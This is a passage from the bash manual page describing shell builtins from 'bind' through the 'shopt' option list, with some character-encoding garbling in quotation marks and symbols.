variable names and values. -s Display readline key sequences bound to macros and the strings they output in such a way that they can be re- read. -S Display readline key sequences bound to macros and the strings they output. -f filename Read key bindings from filename. -q function Query about which keys invoke the named function. -u function Unbind all keys bound to the named function. -r keyseq Remove any current binding for keyseq. -x keyseq:shell-command Cause shell-command to be executed whenever keyseq is entered. The return value is 0 unless an unrecognized option is given or an error occurred. break [n] Exit from within a for, while, until, or select loop. If n is specified, break n levels. n must be ⥠1. If n is greater than the number of enclosing loops, all enclosing loops are exited. The return value is non-zero when n is ⤠0; Otherwise, break returns 0 value. builtin shell-builtin [arguments] Execute the specified shell builtin, passing it arguments, and return its exit status. This is useful when defining a function whose name is the same as a shell builtin, retaining the func- tionality of the builtin within the function. The cd builtin is commonly redefined this way. The return status is false if shell-builtin is not a shell builtin command. cd [-L|-P] [dir] Change the current directory to dir. The variable HOME is the default dir. The variable CDPATH defines the search path for the directory containing dir. Alternative directory names in CDPATH are separated by a colon (:). A null directory name in CDPATH is the same as the current directory, i.e., ââ.ââ. If dir begins with a slash (/), then CDPATH is not used. The -P option says to use the physical directory structure instead of following symbolic links (see also the -P option to the set builtin command); the -L option forces symbolic links to be fol- lowed. An argument of - is equivalent to $OLDPWD. If a non- empty directory name from CDPATH is used, or if - is the first argument, and the directory change is successful, the absolute pathname of the new working directory is written to the standard output. The return value is true if the directory was success- fully changed; false otherwise. caller [expr] Returns the context of any active subroutine call (a shell func- tion or a script executed with the . or source builtins. With- out expr, caller displays the line number and source filename of the current subroutine call. If a non-negative integer is sup- plied as expr, caller displays the line number, subroutine name, and source file corresponding to that position in the current execution call stack. This extra information may be used, for example, to print a stack trace. The current frame is frame 0. The return value is 0 unless the shell is not executing a sub- routine call or expr does not correspond to a valid position in the call stack. command [-pVv] command [arg ...] Run command with args suppressing the normal shell function lookup. Only builtin commands or commands found in the PATH are executed. If the -p option is given, the search for command is performed using a default value for PATH that is guaranteed to find all of the standard utilities. If either the -V or -v option is supplied, a description of command is printed. The -v option causes a single word indicating the command or file name used to invoke command to be displayed; the -V option produces a more verbose description. If the -V or -v option is supplied, the exit status is 0 if command was found, and 1 if not. If neither option is supplied and an error occurred or command can- not be found, the exit status is 127. Otherwise, the exit sta- tus of the command builtin is the exit status of command. compgen [option] [word] Generate possible completion matches for word according to the options, which may be any option accepted by the complete builtin with the exception of -p and -r, and write the matches to the standard output. When using the -F or -C options, the various shell variables set by the programmable completion facilities, while available, will not have useful values. The matches will be generated in the same way as if the pro- grammable completion code had generated them directly from a completion specification with the same flags. If word is speci- fied, only those completions matching word will be displayed. The return value is true unless an invalid option is supplied, or no matches were generated. complete [-abcdefgjksuv] [-o comp-option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] name [name ...] complete -pr [name ...] Specify how arguments to each name should be completed. If the -p option is supplied, or if no options are supplied, existing completion specifications are printed in a way that allows them to be reused as input. The -r option removes a completion spec- ification for each name, or, if no names are supplied, all com- pletion specifications. The process of applying these completion specifications when word completion is attempted is described above under Pro- grammable Completion. Other options, if specified, have the following meanings. The arguments to the -G, -W, and -X options (and, if necessary, the -P and -S options) should be quoted to protect them from expan- sion before the complete builtin is invoked. -o comp-option The comp-option controls several aspects of the comp- specâs behavior beyond the simple generation of comple- tions. comp-option may be one of: bashdefault Perform the rest of the default bash completions if the compspec generates no matches. default Use readlineâs default filename completion if the compspec generates no matches. dirnames Perform directory name completion if the comp- spec generates no matches. filenames Tell readline that the compspec generates file- names, so it can perform any filename-specific processing (like adding a slash to directory names or suppressing trailing spaces). Intended to be used with shell functions. nospace Tell readline not to append a space (the default) to words completed at the end of the line. plusdirs After any matches defined by the compspec are generated, directory name completion is attempted and any matches are added to the results of the other actions. -A action The action may be one of the following to generate a list of possible completions: alias Alias names. May also be specified as -a. arrayvar Array variable names. binding Readline key binding names. builtin Names of shell builtin commands. May also be specified as -b. command Command names. May also be specified as -c. directory Directory names. May also be specified as -d. disabled Names of disabled shell builtins. enabled Names of enabled shell builtins. export Names of exported shell variables. May also be specified as -e. file File names. May also be specified as -f. function Names of shell functions. group Group names. May also be specified as -g. helptopic Help topics as accepted by the help builtin. hostname Hostnames, as taken from the file specified by the HOSTFILE shell variable. job Job names, if job control is active. May also be specified as -j. keyword Shell reserved words. May also be specified as -k. running Names of running jobs, if job control is active. service Service names. May also be specified as -s. setopt Valid arguments for the -o option to the set builtin. shopt Shell option names as accepted by the shopt builtin. signal Signal names. stopped Names of stopped jobs, if job control is active. user User names. May also be specified as -u. variable Names of all shell variables. May also be spec- ified as -v. -G globpat The filename expansion pattern globpat is expanded to generate the possible completions. -W wordlist The wordlist is split using the characters in the IFS special variable as delimiters, and each resultant word is expanded. The possible completions are the members of the resultant list which match the word being com- pleted. -C command command is executed in a subshell environment, and its output is used as the possible completions. -F function The shell function function is executed in the current shell environment. When it finishes, the possible com- pletions are retrieved from the value of the COMPREPLY array variable. -X filterpat filterpat is a pattern as used for filename expansion. It is applied to the list of possible completions gener- ated by the preceding options and arguments, and each completion matching filterpat is removed from the list. A leading ! in filterpat negates the pattern; in this case, any completion not matching filterpat is removed. -P prefix prefix is added at the beginning of each possible com- pletion after all other options have been applied. -S suffix suffix is appended to each possible completion after all other options have been applied. The return value is true unless an invalid option is supplied, an option other than -p or -r is supplied without a name argu- ment, an attempt is made to remove a completion specification for a name for which no specification exists, or an error occurs adding a completion specification. continue [n] Resume the next iteration of the enclosing for, while, until, or select loop. If n is specified, resume at the nth enclosing loop. n must be ⥠1. If n is greater than the number of enclosing loops, the last enclosing loop (the ââtop-levelââ loop) is resumed. When continue is executed inside of loop, the return value is non-zero when n is ⤠0; Otherwise, continue returns 0 value. When continue is executed outside of loop, the return value is 0. declare [-afFirtx] [-p] [name[=value] ...] typeset [-afFirtx] [-p] [name[=value] ...] Declare variables and/or give them attributes. If no names are given then display the values of variables. The -p option will display the attributes and values of each name. When -p is used, additional options are ignored. The -F option inhibits the display of function definitions; only the function name and attributes are printed. If the extdebug shell option is enabled using shopt, the source file name and line number where the function is defined are displayed as well. The -F option implies -f. The following options can be used to restrict out- put to variables with the specified attribute or to give vari- ables attributes: -a Each name is an array variable (see Arrays above). -f Use function names only. -i The variable is treated as an integer; arithmetic evalua- tion (see ARITHMETIC EVALUATION ) is performed when the variable is assigned a value. -r Make names readonly. These names cannot then be assigned values by subsequent assignment statements or unset. -t Give each name the trace attribute. Traced functions inherit the DEBUG and RETURN traps from the calling shell. The trace attribute has no special meaning for variables. -x Mark names for export to subsequent commands via the environment. Using â+â instead of â-â turns off the attribute instead, with the exception that +a may not be used to destroy an array vari- able. When used in a function, makes each name local, as with the local command. If a variable name is followed by =value, the value of the variable is set to value. The return value is 0 unless an invalid option is encountered, an attempt is made to define a function using ââ-f foo=barââ, an attempt is made to assign a value to a readonly variable, an attempt is made to assign a value to an array variable without using the compound assignment syntax (see Arrays above), one of the names is not a valid shell variable name, an attempt is made to turn off read- only status for a readonly variable, an attempt is made to turn off array status for an array variable, or an attempt is made to display a non-existent function with -f. dirs [-clpv] [+n] [-n] Without options, displays the list of currently remembered directories. The default display is on a single line with directory names separated by spaces. Directories are added to the list with the pushd command; the popd command removes entries from the list. +n Displays the nth entry counting from the left of the list shown by dirs when invoked without options, starting with zero. -n Displays the nth entry counting from the right of the list shown by dirs when invoked without options, starting with zero. -c Clears the directory stack by deleting all of the entries. -l Produces a longer listing; the default listing format uses a tilde to denote the home directory. -p Print the directory stack with one entry per line. -v Print the directory stack with one entry per line, pre- fixing each entry with its index in the stack. The return value is 0 unless an invalid option is supplied or n indexes beyond the end of the directory stack. disown [-ar] [-h] [jobspec ...] Without options, each jobspec is removed from the table of active jobs. If the -h option is given, each jobspec is not removed from the table, but is marked so that SIGHUP is not sent to the job if the shell receives a SIGHUP. If no jobspec is present, and neither the -a nor the -r option is supplied, the current job is used. If no jobspec is supplied, the -a option means to remove or mark all jobs; the -r option without a job- spec argument restricts operation to running jobs. The return value is 0 unless a jobspec does not specify a valid job. echo [-neE] [arg ...] Output the args, separated by spaces, followed by a newline. The return status is always 0. If -n is specified, the trailing newline is suppressed. If the -e option is given, interpreta- tion of the following backslash-escaped characters is enabled. The -E option disables the interpretation of these escape char- acters, even on systems where they are interpreted by default. The xpg_echo shell option may be used to dynamically determine whether or not echo expands these escape characters by default. echo does not interpret -- to mean the end of options. echo interprets the following escape sequences: \a alert (bell) \b backspace \c suppress trailing newline \e an escape character \f form feed \n new line \r carriage return \t horizontal tab \v vertical tab \\ backslash nnn the eight-bit character whose value is the octal value nnn (zero to three octal digits) \xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits) enable [-adnps] [-f filename] [name ...] Enable and disable builtin shell commands. Disabling a builtin allows a disk command which has the same name as a shell builtin to be executed without specifying a full pathname, even though the shell normally searches for builtins before disk commands. If -n is used, each name is disabled; otherwise, names are enabled. For example, to use the test binary found via the PATH instead of the shell builtin version, run ââenable -n testââ. The -f option means to load the new builtin command name from shared object filename, on systems that support dynamic loading. The -d option will delete a builtin previously loaded with -f. If no name arguments are given, or if the -p option is supplied, a list of shell builtins is printed. With no other option argu- ments, the list consists of all enabled shell builtins. If -n is supplied, only disabled builtins are printed. If -a is sup- plied, the list printed includes all builtins, with an indica- tion of whether or not each is enabled. If -s is supplied, the output is restricted to the POSIX special builtins. The return value is 0 unless a name is not a shell builtin or there is an error loading a new builtin from a shared object. eval [arg ...] The args are read and concatenated together into a single com- mand. This command is then read and executed by the shell, and its exit status is returned as the value of eval. If there are no args, or only null arguments, eval returns 0. exec [-cl] [-a name] [command [arguments]] If command is specified, it replaces the shell. No new process is created. The arguments become the arguments to command. If the -l option is supplied, the shell places a dash at the begin- ning of the zeroth arg passed to command. This is what login(1) does. The -c option causes command to be executed with an empty environment. If -a is supplied, the shell passes name as the zeroth argument to the executed command. If command cannot be executed for some reason, a non-interactive shell exits, unless the shell option execfail is enabled, in which case it returns failure. An interactive shell returns failure if the file can- not be executed. If command is not specified, any redirections take effect in the current shell, and the return status is 0. If there is a redirection error, the return status is 1. exit [n] Cause the shell to exit with a status of n. If n is omitted, the exit status is that of the last command executed. A trap on EXIT is executed before the shell terminates. export [-fn] [name[=word]] ... export -p The supplied names are marked for automatic export to the envi- ronment of subsequently executed commands. If the -f option is given, the names refer to functions. If no names are given, or if the -p option is supplied, a list of all names that are exported in this shell is printed. The -n option causes the export property to be removed from each name. If a variable name is followed by =word, the value of the variable is set to word. export returns an exit status of 0 unless an invalid option is encountered, one of the names is not a valid shell variable name, or -f is supplied with a name that is not a func- tion. fc [-e ename] [-nlr] [first] [last] fc -s [pat=rep] [cmd] Fix Command. In the first form, a range of commands from first to last is selected from the history list. First and last may be specified as a string (to locate the last command beginning with that string) or as a number (an index into the history list, where a negative number is used as an offset from the cur- rent command number). If last is not specified it is set to the current command for listing (so that ââfc -l -10ââ prints the last 10 commands) and to first otherwise. If first is not spec- ified it is set to the previous command for editing and -16 for listing. The -n option suppresses the command numbers when listing. The -r option reverses the order of the commands. If the -l option is given, the commands are listed on standard output. Other- wise, the editor given by ename is invoked on a file containing those commands. If ename is not given, the value of the FCEDIT variable is used, and the value of EDITOR if FCEDIT is not set. If neither variable is set, is used. When editing is complete, the edited commands are echoed and executed. In the second form, command is re-executed after each instance of pat is replaced by rep. A useful alias to use with this is ââr="fc -s"ââ, so that typing ââr ccââ runs the last command beginning with ââccââ and typing âârââ re-executes the last com- mand. If the first form is used, the return value is 0 unless an invalid option is encountered or first or last specify history lines out of range. If the -e option is supplied, the return value is the value of the last command executed or failure if an error occurs with the temporary file of commands. If the second form is used, the return status is that of the command re-exe- cuted, unless cmd does not specify a valid history line, in which case fc returns failure. fg [jobspec] Resume jobspec in the foreground, and make it the current job. If jobspec is not present, the shellâs notion of the current job is used. The return value is that of the command placed into the foreground, or failure if run when job control is disabled or, when run with job control enabled, if jobspec does not spec- ify a valid job or jobspec specifies a job that was started without job control. getopts optstring name [args] getopts is used by shell procedures to parse positional parame- ters. optstring contains the option characters to be recog- nized; if a character is followed by a colon, the option is expected to have an argument, which should be separated from it by white space. The colon and question mark characters may not be used as option characters. Each time it is invoked, getopts places the next option in the shell variable name, initializing name if it does not exist, and the index of the next argument to be processed into the variable OPTIND. OPTIND is initialized to 1 each time the shell or a shell script is invoked. When an option requires an argument, getopts places that argument into the variable OPTARG. The shell does not reset OPTIND automati- cally; it must be manually reset between multiple calls to getopts within the same shell invocation if a new set of parame- ters is to be used. When the end of options is encountered, getopts exits with a return value greater than zero. OPTIND is set to the index of the first non-option argument, and name is set to ?. getopts normally parses the positional parameters, but if more arguments are given in args, getopts parses those instead. getopts can report errors in two ways. If the first character of optstring is a colon, silent error reporting is used. In normal operation diagnostic messages are printed when invalid options or missing option arguments are encountered. If the variable OPTERR is set to 0, no error messages will be dis- played, even if the first character of optstring is not a colon. If an invalid option is seen, getopts places ? into name and, if not silent, prints an error message and unsets OPTARG. If getopts is silent, the option character found is placed in OPTARG and no diagnostic message is printed. If a required argument is not found, and getopts is not silent, a question mark (?) is placed in name, OPTARG is unset, and a diagnostic message is printed. If getopts is silent, then a colon (:) is placed in name and OPTARG is set to the option character found. getopts returns true if an option, specified or unspecified, is found. It returns false if the end of options is encountered or an error occurs. hash [-lr] [-p filename] [-dt] [name] For each name, the full file name of the command is determined by searching the directories in $PATH and remembered. If the -p option is supplied, no path search is performed, and filename is used as the full file name of the command. The -r option causes the shell to forget all remembered locations. The -d option causes the shell to forget the remembered location of each name. If the -t option is supplied, the full pathname to which each name corresponds is printed. If multiple name arguments are supplied with -t, the name is printed before the hashed full pathname. The -l option causes output to be displayed in a for- mat that may be reused as input. If no arguments are given, or if only -l is supplied, information about remembered commands is printed. The return status is true unless a name is not found or an invalid option is supplied. help [-s] [pattern] Display helpful information about builtin commands. If pattern is specified, help gives detailed help on all commands matching pattern; otherwise help for all the builtins and shell control structures is printed. The -s option restricts the information displayed to a short usage synopsis. The return status is 0 unless no command matches pattern. history [n] history -c history -d offset history -anrw [filename] history -p arg [arg ...] history -s arg [arg ...] With no options, display the command history list with line num- bers. Lines listed with a * have been modified. An argument of n lists only the last n lines. If the shell variable HISTTIME- FORMAT is set and not null, it is used as a format string for strftime(3) to display the time stamp associated with each dis- played history entry. No intervening blank is printed between the formatted time stamp and the history line. If filename is supplied, it is used as the name of the history file; if not, the value of HISTFILE is used. Options, if supplied, have the following meanings: -c Clear the history list by deleting all the entries. -d offset Delete the history entry at position offset. -a Append the âânewââ history lines (history lines entered since the beginning of the current bash session) to the history file. -n Read the history lines not already read from the history file into the current history list. These are lines appended to the history file since the beginning of the current bash session. -r Read the contents of the history file and use them as the current history. -w Write the current history to the history file, overwrit- ing the history fileâs contents. -p Perform history substitution on the following args and display the result on the standard output. Does not store the results in the history list. Each arg must be quoted to disable normal history expansion. -s Store the args in the history list as a single entry. The last command in the history list is removed before the args are added. If the HISTTIMEFORMAT is set, the time stamp information associ- ated with each history entry is written to the history file. The return value is 0 unless an invalid option is encountered, an error occurs while reading or writing the history file, an invalid offset is supplied as an argument to -d, or the history expansion supplied as an argument to -p fails. jobs [-lnprs] [ jobspec ... ] jobs -x command [ args ... ] The first form lists the active jobs. The options have the fol- lowing meanings: -l List process IDs in addition to the normal information. -p List only the process ID of the jobâs process group leader. -n Display information only about jobs that have changed status since the user was last notified of their status. -r Restrict output to running jobs. -s Restrict output to stopped jobs. If jobspec is given, output is restricted to information about that job. The return status is 0 unless an invalid option is encountered or an invalid jobspec is supplied. If the -x option is supplied, jobs replaces any jobspec found in command or args with the corresponding process group ID, and executes command passing it args, returning its exit status. kill [-s sigspec | -n signum | -sigspec] [pid | jobspec] ... kill -l [sigspec | exit_status] Send the signal named by sigspec or signum to the processes named by pid or jobspec. sigspec is either a case-insensitive signal name such as SIGKILL (with or without the SIG prefix) or a signal number; signum is a signal number. If sigspec is not present, then SIGTERM is assumed. An argument of -l lists the signal names. If any arguments are supplied when -l is given, the names of the signals corresponding to the arguments are listed, and the return status is 0. The exit_status argument to -l is a number specifying either a signal number or the exit status of a process terminated by a signal. kill returns true if at least one signal was successfully sent, or false if an error occurs or an invalid option is encountered. let arg [arg ...] Each arg is an arithmetic expression to be evaluated (see ARITH- METIC EVALUATION). If the last arg evaluates to 0, let returns 1; 0 is returned otherwise. local [option] [name[=value] ...] For each argument, a local variable named name is created, and assigned value. The option can be any of the options accepted by declare. When local is used within a function, it causes the variable name to have a visible scope restricted to that func- tion and its children. With no operands, local writes a list of local variables to the standard output. It is an error to use local when not within a function. The return status is 0 unless local is used outside a function, an invalid name is supplied, or name is a readonly variable. logout Exit a login shell. popd [-n] [+n] [-n] Removes entries from the directory stack. With no arguments, removes the top directory from the stack, and performs a cd to the new top directory. Arguments, if supplied, have the follow- ing meanings: +n Removes the nth entry counting from the left of the list shown by dirs, starting with zero. For example: ââpopd +0ââ removes the first directory, ââpopd +1ââ the second. -n Removes the nth entry counting from the right of the list shown by dirs, starting with zero. For example: ââpopd -0ââ removes the last directory, ââpopd -1ââ the next to last. -n Suppresses the normal change of directory when removing directories from the stack, so that only the stack is manipulated. If the popd command is successful, a dirs is performed as well, and the return status is 0. popd returns false if an invalid option is encountered, the directory stack is empty, a non-exis- tent directory stack entry is specified, or the directory change fails. printf [-v var] format [arguments] Write the formatted arguments to the standard output under the control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences, which are converted and copied to the standard output, and for- mat specifications, each of which causes printing of the next successive argument. In addition to the standard printf(1) for- mats, %b causes printf to expand backslash escape sequences in the corresponding argument (except that \c terminates output, backslashes in \', \", and \? are not removed, and octal escapes beginning with may contain up to four digits), and %q causes printf to output the corresponding argument in a format that can be reused as shell input. The -v option causes the output to be assigned to the variable var rather than being printed to the standard output. The format is reused as necessary to consume all of the argu- ments. If the format requires more arguments than are supplied, the extra format specifications behave as if a zero value or null string, as appropriate, had been supplied. The return value is zero on success, non-zero on failure. pushd [-n] [dir] pushd [-n] [+n] [-n] Adds a directory to the top of the directory stack, or rotates the stack, making the new top of the stack the current working directory. With no arguments, exchanges the top two directories and returns 0, unless the directory stack is empty. Arguments, if supplied, have the following meanings: +n Rotates the stack so that the nth directory (counting from the left of the list shown by dirs, starting with zero) is at the top. -n Rotates the stack so that the nth directory (counting from the right of the list shown by dirs, starting with zero) is at the top. -n Suppresses the normal change of directory when adding directories to the stack, so that only the stack is manipulated. dir Adds dir to the directory stack at the top, making it the new current working directory. If the pushd command is successful, a dirs is performed as well. If the first form is used, pushd returns 0 unless the cd to dir fails. With the second form, pushd returns 0 unless the direc- tory stack is empty, a non-existent directory stack element is specified, or the directory change to the specified new current directory fails. pwd [-LP] Print the absolute pathname of the current working directory. The pathname printed contains no symbolic links if the -P option is supplied or the -o physical option to the set builtin command is enabled. If the -L option is used, the pathname printed may contain symbolic links. The return status is 0 unless an error occurs while reading the name of the current directory or an invalid option is supplied. read [-ers] [-u fd] [-t timeout] [-a aname] [-p prompt] [-n nchars] [-d delim] [name ...] One line is read from the standard input, or from the file descriptor fd supplied as an argument to the -u option, and the first word is assigned to the first name, the second word to the second name, and so on, with leftover words and their interven- ing separators assigned to the last name. If there are fewer words read from the input stream than names, the remaining names are assigned empty values. The characters in IFS are used to split the line into words. The backslash character (\) may be used to remove any special meaning for the next character read and for line continuation. Options, if supplied, have the fol- lowing meanings: -a aname The words are assigned to sequential indices of the array variable aname, starting at 0. aname is unset before any new values are assigned. Other name arguments are ignored. -d delim The first character of delim is used to terminate the input line, rather than newline. -e If the standard input is coming from a terminal, readline (see READLINE above) is used to obtain the line. -n nchars read returns after reading nchars characters rather than waiting for a complete line of input. -p prompt Display prompt on standard error, without a trailing new- line, before attempting to read any input. The prompt is displayed only if input is coming from a terminal. -r Backslash does not act as an escape character. The back- slash is considered to be part of the line. In particu- lar, a backslash-newline pair may not be used as a line continuation. -s Silent mode. If input is coming from a terminal, charac- ters are not echoed. -t timeout Cause read to time out and return failure if a complete line of input is not read within timeout seconds. This option has no effect if read is not reading input from the terminal or a pipe. -u fd Read input from file descriptor fd. If no names are supplied, the line read is assigned to the vari- able REPLY. The return code is zero, unless end-of-file is encountered, read times out, or an invalid file descriptor is supplied as the argument to -u. readonly [-apf] [name[=word] ...] The given names are marked readonly; the values of these names may not be changed by subsequent assignment. If the -f option is supplied, the functions corresponding to the names are so marked. The -a option restricts the variables to arrays. If no name arguments are given, or if the -p option is supplied, a list of all readonly names is printed. The -p option causes output to be displayed in a format that may be reused as input. If a variable name is followed by =word, the value of the vari- able is set to word. The return status is 0 unless an invalid option is encountered, one of the names is not a valid shell variable name, or -f is supplied with a name that is not a function. return [n] Causes a function to exit with the return value specified by n. If n is omitted, the return status is that of the last command executed in the function body. If used outside a function, but during execution of a script by the . (source) command, it causes the shell to stop executing that script and return either n or the exit status of the last command executed within the script as the exit status of the script. If used outside a function and not during execution of a script by ., the return status is false. Any command associated with the RETURN trap is executed before execution resumes after the function or script. set [--abefhkmnptuvxBCHP] [-o option] [arg ...] Without options, the name and value of each shell variable are displayed in a format that can be reused as input for setting or resetting the currently-set variables. Read-only variables can- not be reset. In posix mode, only shell variables are listed. The output is sorted according to the current locale. When options are specified, they set or unset shell attributes. Any arguments remaining after the options are processed are treated as values for the positional parameters and are assigned, in order, to $1, $2, ... $n. Options, if specified, have the fol- lowing meanings: -a Automatically mark variables and functions which are modified or created for export to the environment of subsequent commands. -b Report the status of terminated background jobs immedi- ately, rather than before the next primary prompt. This is effective only when job control is enabled. -e Exit immediately if a simple command (see SHELL GRAMMAR above) exits with a non-zero status. The shell does not exit if the command that fails is part of the command list immediately following a while or until keyword, part of the test in an if statement, part of a && or ââ list, or if the commandâs return value is being inverted via !. A trap on ERR, if set, is executed before the shell exits. -f Disable pathname expansion. -h Remember the location of commands as they are looked up for execution. This is enabled by default. -k All arguments in the form of assignment statements are placed in the environment for a command, not just those that precede the command name. -m Monitor mode. Job control is enabled. This option is on by default for interactive shells on systems that support it (see JOB CONTROL above). Background pro- cesses run in a separate process group and a line con- taining their exit status is printed upon their comple- tion. -n Read commands but do not execute them. This may be used to check a shell script for syntax errors. This is ignored by interactive shells. -o option-name The option-name can be one of the following: allexport Same as -a. braceexpand Same as -B. emacs Use an emacs-style command line editing inter- face. This is enabled by default when the shell is interactive, unless the shell is started with the --noediting option. errtrace Same as -E. functrace Same as -T. errexit Same as -e. hashall Same as -h. histexpand Same as -H. history Enable command history, as described above under HISTORY. This option is on by default in inter- active shells. ignoreeof The effect is as if the shell command ââIGNOREEOF=10ââ had been executed (see Shell Variables above). keyword Same as -k. monitor Same as -m. noclobber Same as -C. noexec Same as -n. noglob Same as -f. nolog Currently ignored. notify Same as -b. nounset Same as -u. onecmd Same as -t. physical Same as -P. pipefail If set, the return value of a pipeline is the value of the last (rightmost) command to exit with a non-zero status, or zero if all commands in the pipeline exit successfully. This option is disabled by default. posix Change the behavior of bash where the default operation differs from the POSIX standard to match the standard (posix mode). privileged Same as -p. verbose Same as -v. vi Use a vi-style command line editing interface. xtrace Same as -x. If -o is supplied with no option-name, the values of the current options are printed. If +o is supplied with no option-name, a series of set commands to recreate the current option settings is displayed on the standard output. -p Turn on privileged mode. In this mode, the $ENV and $BASH_ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS variable, if it appears in the environment, is ignored. If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, these actions are taken and the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset. Turning this option off causes the effective user and group ids to be set to the real user and group ids. -t Exit after reading and executing one command. -u Treat unset variables as an error when performing param- eter expansion. If expansion is attempted on an unset variable, the shell prints an error message, and, if not interactive, exits with a non-zero status. -v Print shell input lines as they are read. -x After expanding each simple command, for command, case command, select command, or arithmetic for command, dis- play the expanded value of PS4, followed by the command and its expanded arguments or associated word list. -B The shell performs brace expansion (see Brace Expansion above). This is on by default. -C If set, bash does not overwrite an existing file with the >, >&, and <> redirection operators. This may be overridden when creating output files by using the redi- rection operator >| instead of >. -E If set, any trap on ERR is inherited by shell functions, command substitutions, and commands executed in a sub- shell environment. The ERR trap is normally not inher- ited in such cases. -H Enable ! style history substitution. This option is on by default when the shell is interactive. -P If set, the shell does not follow symbolic links when executing commands such as cd that change the current working directory. It uses the physical directory structure instead. By default, bash follows the logical chain of directories when performing commands which change the current directory. -T If set, any traps on DEBUG and RETURN are inherited by shell functions, command substitutions, and commands executed in a subshell environment. The DEBUG and RETURN traps are normally not inherited in such cases. -- If no arguments follow this option, then the positional parameters are unset. Otherwise, the positional parame- ters are set to the args, even if some of them begin with a -. - Signal the end of options, cause all remaining args to be assigned to the positional parameters. The -x and -v options are turned off. If there are no args, the posi- tional parameters remain unchanged. The options are off by default unless otherwise noted. Using + rather than - causes these options to be turned off. The options can also be specified as arguments to an invocation of the shell. The current set of options may be found in $-. The return status is always true unless an invalid option is encoun- tered. shift [n] The positional parameters from n+1 ... are renamed to $1 .... Parameters represented by the numbers $# down to $#-n+1 are unset. n must be a non-negative number less than or equal to $#. If n is 0, no parameters are changed. If n is not given, it is assumed to be 1. If n is greater than $#, the positional parameters are not changed. The return status is greater than zero if n is greater than $# or less than zero; otherwise 0. shopt [-pqsu] [-o] [optname ...] Toggle the values of variables controlling optional shell behav- ior. With no options, or with the -p option, a list of all set- table options is displayed, with an indication of whether or not each is set. The -p option causes output to be displayed in a form that may be reused as input. Other options have the fol- lowing meanings: -s Enable (set) each optname. -u Disable (unset) each optname. -q Suppresses normal output (quiet mode); the return status indicates whether the optname is set or unset. If multiple optname arguments are given with -q, the return status is zero if all optnames are enabled; non-zero oth- erwise. -o Restricts the values of optname to be those defined for the -o option to the set builtin. If either -s or -u is used with no optname arguments, the dis- play is limited to those options which are set or unset, respec- tively. Unless otherwise noted, the shopt options are disabled (unset) by default. The return status when listing options is zero if all optnames are enabled, non-zero otherwise. When setting or unsetting options, the return status is zero unless an optname is not a valid shell option. The list of shopt options is: cdable_vars If set, an argument to the cd builtin command that is not a directory is assumed to be the name of a variable whose value is the directory to change to. cdspell If set, minor errors in the spelling of a directory com- ponent in a cd command will be corrected. The errors checked for are transposed characters, a missing charac- ter, and one character too many. If a correction is found, the corrected file name is printed, and the com- mand proceeds. This option is only used by interactive shells. checkhash If set, bash checks that a command found in the hash ta- ble exists before trying to execute it. If a hashed command no longer exists, a normal path search is per- formed. checkwinsize If set, bash checks the window size after each command and, if necessary, updates the values of LINES and COLUMNS. cmdhist If set, bash attempts to save all lines of a multiple- line command in the same history entry. This allows easy re-editing of multi-line commands. dotglob If set, bash includes filenames beginning with a â.â in the results of pathname expansion. execfail If set, a non-interactive shell will not exit if it can- not execute the file specified as an argument to the exec builtin command. An interactive shell does not exit if exec fails. expand_aliases If set, aliases are expanded as described above under ALIASES. This option is enabled by default for interac- tive shells. extdebug If set, behavior intended for use by debuggers is enabled: 1. The -F option to the declare builtin displays the source file name and line number corresponding to each function name supplied as an argument. 2. If the command run by the DEBUG trap returns a non-zero value, the next command is skipped and not executed. 3. If the command run by the DEBUG trap returns a value of 2, and the shell is executing in a sub- routine (a shell function or a shell script exe- cuted by the . or source builtins), a call to return is simulated. 4. BASH_ARGC and BASH_ARGV are updated as described in their descriptions above. 5. Function tracing is enabled: command substitu- tion, shell functions, and subshells invoked with ( command ) inherit the DEBUG and RETURN traps. 6. Error tracing is enabled: command substitution, shell functions, and subshells invoked with ( command ) inherit the ERROR trap. extglob If set, the extended pattern matching features described above under Pathname Expansion are enabled. extquote If set, $'string' and $"string" quoting is performed within ${parameter} expansions enclosed in double quotes. This option is enabled by default. failglob If set, patterns which fail to match filenames during pathname expansion result in an expansion error. force_fignore If set, the suffixes specified by the FIGNORE shell variable cause words to be ignored when performing word completion even if the ignored words are the only possi- ble completions. See SHELL VARIABLES above for a description of FIGNORE. This option is enabled by default. gnu_errfmt If set, shell error messages are written in the standard GNU error message format. histappend If set, the history list is appended to the file named by the value of the HISTFILE variable when the shell exits, rather than overwriting the file. histreedit If set, and readline is being used, a user is given the opportunity to re-edit a failed history substitution. histverify If set, and readline is being used, the results of his- tory substitution are not immediately passed to the shell parser. Instead, the resulting line is loaded into the readline editing buffer, allowing further modi- fication. hostcomplete If set, and readline is being used, bash will attempt to perform hostname completion when a word containing a @ is being completed (see Completing under READLINE above). This is enabled by default. huponexit If set, bash will send SIGHUP to all jobs when an inter- active login shell exits. interactive_comments If set, allow a word beginning with # to cause that word and all remaining characters on that line to be ignored in an interactive shell (see COMMENTS above). This option is enabled by default. lithist If set, and the cmdhist option is enabled, multi-line commands are saved to the history with embedded newlines rather than using semicolon separators where possible. login_shell The shell sets this option if it is started as a login shell (see INVOCATION above). The value may not be changed. mailwarn If set, and a file that bash is checking for mail has been accessed since the last time it was checked, the message ââThe mail in mailfile has been readââ is dis- played. no_empty_cmd_completion If set, and readline is being used, bash will not attempt to search the PATH for possible completions when completion is attempted on an empty line. nocaseglob If set, bash matches filenames in a case-insensitive fashion when performing pathname expansion (see Pathname Expansion above). nocasematch If set, bash matches patterns in a case-insensitive fashion when performing matching while executing case or [[ conditional commands. nullglob If set, bash allows patterns which match no files (see Pathname Expansion above) to expand to a null string, rather than themselves. progcomp If set, the programmable completion facilities (see Pro- grammable Completion above) are enabled. This option is enabled by default. promptvars If set, prompt strings undergo parameter expansion, com- mand substitution, arithmetic expansion, and quote removal after being expanded as described in PROMPTING above. This option is enabled by default. restricted_shell The shell sets this option if it is started in restricted mode (see RESTRICTED SHELL below). The value may not be changed. This is not reset when the startup files are executed, allowing the startup files to dis- cover whether or not a shell is restricted. shift_verbose If set, the shift builtin prints an error message when the shift count exceeds the number of positional parame- ters. sourcepath If set, the source (.) builtin uses the value of PATH to find the directory containing the file supplied as an argument. This option is enabled by default. xpg_echo If set, 